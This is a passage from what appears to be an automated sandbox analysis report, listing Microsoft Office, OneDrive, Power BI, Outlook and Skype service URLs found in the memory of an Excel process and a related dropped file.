Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netr
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://api.office.netx
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.onedrive.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://api.onedrive.comcent
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://augloop.office.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: EXCEL.EXE, 00000000.00000003.433453972.0000000012E78000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429211317.0000000012E78000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629921946.0000000012E78000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536887114.0000000012E78000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://augloop.office.comm
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmli
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: EXCEL.EXE, 00000000.00000002.626211549.000000000D6EE000.00000004.00000001.sdmp String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellp
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/5
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/e
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies-
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/iosP
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/macG
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyP
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyc
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://config.edge.skype.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://config.edge.skype.coms
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cortana.ai
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://cortana.aietl
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://cr.office.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.com/H
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.com4
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://dataservice.o365filtering.comB
